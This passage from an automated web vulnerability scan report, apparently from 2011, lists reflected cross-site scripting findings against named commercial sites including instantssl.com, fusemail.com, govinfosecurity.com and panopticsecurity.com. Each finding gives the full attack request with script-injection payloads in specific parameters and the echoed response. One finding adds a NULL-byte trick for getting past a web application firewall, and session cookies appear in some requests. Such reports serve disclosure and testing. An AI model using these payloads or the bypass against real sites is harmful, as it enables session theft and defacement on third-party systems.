<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<span class=error>16f0f<script>alert(1)</script>780d4eeba57afd885</span>
...[SNIP]...

1.14. https://secure.instantssl.com/products/SSLIdASignup1a [loginPassword parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/SSLIdASignup1a

Issue detail

The value of the loginPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2a4"><script>alert(1)</script>caff33464a191e275 was submitted in the loginPassword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /products/SSLIdASignup1a?SID=NtcydAl8wNmXs5S2&product=342&days=90&loginName=&loginPassword=ef2a4"><script>alert(1)</script>caff33464a191e275&loginErrorMessage= HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/products/frontpage?area=SSL&product=342&days=90&ap=InstantSSL
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Pragma: no-cache
Cache-Control: max-age=-1
Expires: -1
Content-Length: 18077

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>InstantSSL Security Services</title>
<link rel=stylesheet href=/css/css.css>
</head>
<body bgcolor=#99999
...[SNIP]...
<input type=password name=loginPassword maxlength=128 size=15 value="ef2a4"><script>alert(1)</script>caff33464a191e275" class=input2>
...[SNIP]...

1.15. http://www.fusemail.com/products/email-archiving/request-more-information/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fusemail.com
Path:   /products/email-archiving/request-more-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c801c'><script>alert(1)</script>215844610ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c801c\\\'><script>alert(1)</script>215844610ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&c801c'><script>alert(1)</script>215844610ea=1 HTTP/1.1
Host: www.fusemail.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
X-Pingback: http://www.fusemail.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 28034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method='post' enctype='multipart/form-data' id='gform_1' action='/products/email-archiving/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&c801c\\\'><script>alert(1)</script>215844610ea=1'>
...[SNIP]...

1.16. http://www.fusemail.com/products/spam-and-virus-filtering/request-more-information/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fusemail.com
Path:   /products/spam-and-virus-filtering/request-more-information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bee2a'><script>alert(1)</script>725db01c0f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bee2a\\\'><script>alert(1)</script>725db01c0f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&bee2a'><script>alert(1)</script>725db01c0f4=1 HTTP/1.1
Host: www.fusemail.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
X-Pingback: http://www.fusemail.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 27374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<form method='post' enctype='multipart/form-data' id='gform_7' action='/products/spam-and-virus-filtering/request-more-information/?utm_source=j2&utm_medium=crosssell&utm_campaign=enterprisepage&bee2a\\\'><script>alert(1)</script>725db01c0f4=1'>
...[SNIP]...

1.17. http://www.govinfosecurity.com/articles.php [art_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The value of the art_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88745"-alert(1)-"cc145464d1f was submitted in the art_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles.php?art_id=406788745"-alert(1)-"cc145464d1f HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 77596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
(function (JQ1) {
   JQ1("a#my-link-popup1").click(function () {
       JQ1.floatbox({
           ajax: {
               url: "http://www.govinfosecurity.com/popup.php?rdu=http://www.govinfosecurity.com/articles.php?art_id=406788745"-alert(1)-"cc145464d1f", // request url
               params: "", //post parameters
               before: "<p align='center'>
...[SNIP]...

1.18. http://www.govinfosecurity.com/articles.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3be59"-alert(1)-"5e980f04183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles.php?art_id=4067&3be59"-alert(1)-"5e980f04183=1 HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 94708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
function (JQ1) {
   JQ1("a#my-link-popup1").click(function () {
       JQ1.floatbox({
           ajax: {
               url: "http://www.govinfosecurity.com/popup.php?rdu=http://www.govinfosecurity.com/articles.php?art_id=4067&3be59"-alert(1)-"5e980f04183=1", // request url
               params: "", //post parameters
               before: "<p align='center'>
...[SNIP]...

1.19. http://www.govinfosecurity.com/articles.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.govinfosecurity.com
Path:   /articles.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ceb4a'><script>alert(1)</script>ae00085e7e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles.php?art_id=4067&ceb4a'><script>alert(1)</script>ae00085e7e2=1 HTTP/1.1
Host: www.govinfosecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:11:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fvfq7uh4sorob9bergs9g45t37
Connection: close
Content-Type: text/html
Content-Length: 94603


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type='hidden' name='redirectTo' value='http://www.govinfosecurity.com/articles.php?art_id=4067&ceb4a'><script>alert(1)</script>ae00085e7e2=1'>
...[SNIP]...

1.20. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [contactFirstName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the contactFirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a395b"><script>alert(1)</script>b302652662e was submitted in the contactFirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434a395b"><script>alert(1)</script>b302652662e&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAns
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:50 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="contactFirstName" value="23434a395b"><script>alert(1)</script>b302652662e" size="30" maxlength="30" tabindex="6"/>
...[SNIP]...

1.21. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [contactLastName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the contactLastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71713"><script>alert(1)</script>5f59f30b6ec was submitted in the contactLastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=23423471713"><script>alert(1)</script>5f59f30b6ec&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbo
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:52 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="contactLastName" value="23423471713"><script>alert(1)</script>5f59f30b6ec" size="30" maxlength="30" tabindex="7"/>
...[SNIP]...

1.22. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [emailAddress parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ec"><script>alert(1)</script>e9c997c9693 was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465754ec"><script>alert(1)</script>e9c997c9693&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:56 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="emailAddress" value="46465754ec"><script>alert(1)</script>e9c997c9693" size="32" maxlength="128" tabindex="12"/>
...[SNIP]...

1.23. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [merchantName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the merchantName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d284"><script>alert(1)</script>f9b1a2c229e was submitted in the merchantName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=2342347d284"><script>alert(1)</script>f9b1a2c229e&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+na
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:47 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="merchantName" value="2342347d284"><script>alert(1)</script>f9b1a2c229e" size="48" maxlength="48" tabindex="1"/>
...[SNIP]...

1.24. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [passwordValue parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the passwordValue request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2158"><script>alert(1)</script>bc4664158db was submitted in the passwordValue parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456ale2158"><script>alert(1)</script>bc4664158db&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:53 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="password" name="passwordValue" value="123456ale2158"><script>alert(1)</script>bc4664158db" size="32" maxlength="32" tabindex="10"/>
...[SNIP]...

1.25. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [passwordValueConfirm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the passwordValueConfirm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae3ca"><script>alert(1)</script>82329d9dd11 was submitted in the passwordValueConfirm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456alae3ca"><script>alert(1)</script>82329d9dd11&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:55 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="password" name="passwordValueConfirm" value="123456alae3ca"><script>alert(1)</script>82329d9dd11" size="32" maxlength="32" tabindex="11"/>
...[SNIP]...

1.26. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [phoneNumber parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the phoneNumber request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df5d5"><script>alert(1)</script>3c595ba12de was submitted in the phoneNumber parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456df5d5"><script>alert(1)</script>3c595ba12de&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:57 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="phoneNumber" value="46456df5d5"><script>alert(1)</script>3c595ba12de" size="24" maxlength="24" tabindex="13"/>
...[SNIP]...

1.27. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [salutation parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the salutation request parameter is copied into the HTML document as plain text between tags. The payload %0068c91<script>alert(1)</script>098861a2c93 was submitted in the salutation parameter. This input was echoed as 68c91<script>alert(1)</script>098861a2c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
